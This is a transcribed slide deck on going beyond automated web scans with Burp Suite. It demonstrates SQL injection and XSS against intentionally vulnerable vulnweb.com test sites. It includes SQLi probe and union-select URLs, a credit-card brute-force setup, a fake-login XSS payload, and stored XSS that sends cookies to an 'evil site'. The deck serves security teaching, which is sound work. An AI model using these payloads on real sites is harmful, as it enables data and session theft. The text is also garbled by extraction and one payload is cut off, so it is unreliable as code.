Adding Value to Automated Web Scans. Burp Suite and Beyond

Transcription

1 Adding Value to Automated Web Scans Burp Suite and Beyond

2 Automated Scanning vs Manual Tes;ng Manual Tes;ng Tools/Suites At MSU - QualysGuard WAS & Burp Suite Automated Scanning - iden;fy acack surface accross organiza;on Manual Tes;ng - proxy tools used to verify scan results and find what automated scans miss Both necessary in a large enviroment

3 Automated Scanning vs Manual Tes;ng Strengths of Automated Scanners: Scheduling Repor;ng Scalability Strengths of Manual Scanners: Proxy based - allows intercep;on of requests Customize payloads for vulnerability detec;on Verify findings from automated scan results.

4 Automated Scanning vs Manual Tes;ng Weaknesses of automated scanners: increased poten;al for false posi;ves duplicate findings code coverage not as thourough Weaknesses of manual scanning: tester needs knowledge of applica;on for best results learning curve (developers already stretched thin) not scalable (e.g. distribu;ng reports is very ;me consuming)

5 Methodology Reconnaissance Spider target Hidden Files Google site search End result is a comprehensive map of site Discovery Automated Scanning Manual Detec;on and Analysis Exploit Automated Exploit tools - sqlmap, havij, metasploit Burp Suite - hands- on tes=ng 5

6 Road Map Spider and vulnerability scan already performed Leverage Burp tools to expand upon proof of concepts from scan results Carry out actual acack scenarios 6

7 Tools for this Demo BurpSuite Firefox FoxyProxy addon Firebug addon Target: *.vulnweb.com (inten;onally vulnerable websites from Acune;x)

8 Scan Results Vulnerabilty reports - proof of concept (POC) include request payload and applica;on response POCs are not intui;ve, o\en met with doubt Need to be able to drive home the real risk

9 Scan Report - XSS example

10 Scan Report - SQLi Example

11 SQL Injec;on Boolean Based SQLi (Blind SQL Injec;on) Blind SQLi is possible if applica;on will respond to true and false condi;ons in a detectable manner* hcp://testphp.vulnweb.com/listproducts.php?ar;st=1 and 1=1 //true condi;on hcp://testphp.vulnweb.com/listproducts.php?ar;st=1 and 1=2 //false condi;on ` *Differences between true and false responses could be subtle. The comparer tool highlights the differences between two responses Error Based SQLi Possible if applica;on echos database errors to browser. Errors to reveal informa;on about database that serve as clues for building an acack. 11

12 Demo - SQLi A BeBer Blind SQLi Proof of Concept hcp://testphp.vulnweb.com/listproducts.php?ar;st=1 and substring(@@version, 1,1)=4 and 1=1 // false hcp://testphp.vulnweb.com/listproducts.php?ar;st=1 and substring(@@version, 1,1)=5 and 1=1 //true

13 SQLi Exploit Example A BeBer Error Based SQLi POC testphp.vulnweb.com/listproducts.php?ar=st=1' - error vulnweb.com/listproducts.php?ar=st=1 union all select 1,2,3,4,5,6,7,8,9,10 - error vulnweb.com/listproducts.php?ar=st=1 union all select 1,2,3,4,5,6,7,8,9,10,11 - no error! vulnweb.com/listproducts.php?ar=st=1 union all select 1,2,3,4,5,6,7,8,9,10,11 from users - no error!

14 Cross Site Scrip;ng XSS type 0 - DOM Based acack string embedded in URL and not processed by the server. Executed in the DOM client- side (very much like reflected) XSS type 1 Reflected acack string is submiced with request (usually in URL) and the server embeds the string in the HTML of the response *DOM based and reflected depend on social engineering to succeed XSS type 2 - Persistent (stored) XSS the applica;on stores the acack string so that it is presented in future responses 14

15 Reflected XSS Demo Target: hcp://testasp.vulnweb.com/search.asp?msearch= Goal: modify page to look like login Payload: /Search.asp?mSearch= <script>document.getelementsbyclassname('framedform').item(0).innerhtml = "password <div ><input type='password' id='pw' /><input type='bucon' onclick='alert(pw.value)' value='login' /></div>"; document.getelementsbyclassname('path').item(0).innerhtml = '';</script> *Requires social engineering. Obfuscate the query string to hide script

16 Same Origin Policy Same Origin Policy - SOP allows you to make requests to pages within the same site/domain, while preven;ng you from making requests to pages on a different domain. Without SOP the internet would be very unsafe. Visit my evil site and I can direct your browser to acack any site I want. Goal of XSS acack is to subvert SOP to exfiltrate informa;on

17 Bypassing SOP Image source You are allowed to include images with source outside of the applica;on's domain <img src= evildomain.com? id= /> the src is an HTTP GET request Example XSS <div onmouseover= xssscript() ><img id='evil' src='evildomain.com?id=' size='1px' /></div> <script> func;on xssscript( ){..}</script></div> 17

18 Persistent XSS Demo Target: hcp://testphp.vulnweb.com/guestbook.php Goal: Inject javascript and image to bypass SOP Objec=ve is to send cookie to my evil site: cookiejar.php?d={cookie}

19 Persistent XSS Demo Payload: Hello<div onmouseover=addsource() style= width:100% > <img size='1px' id='badimg' /></div> there <script> func;on addsource(){ document.getelementbyid("badimg").src = "hcp:// } </script>

20 SOP has been subverted!!!

21 Ques;ons

22 SQLi Exploit Example Goal: Use Intruder to brute force the value of the credit card field 1. Set proxy to intercept 2. Submit request in browser hcp://testphp.vulnweb.com/ar;sts.php?ar;st=1 and (select substring(cc,1,1)= 1 from users limit 0,1)=1 3. Send intercepted request to Intruder tool 4. Indicate posi=on(s) to be injected hcp://testphp.vulnweb.com/ar;sts.php?ar;st=1 and (select substring(cc,1,1)= 1 from users limit 0,1)=1 5. Define the payloads 6. Start ABack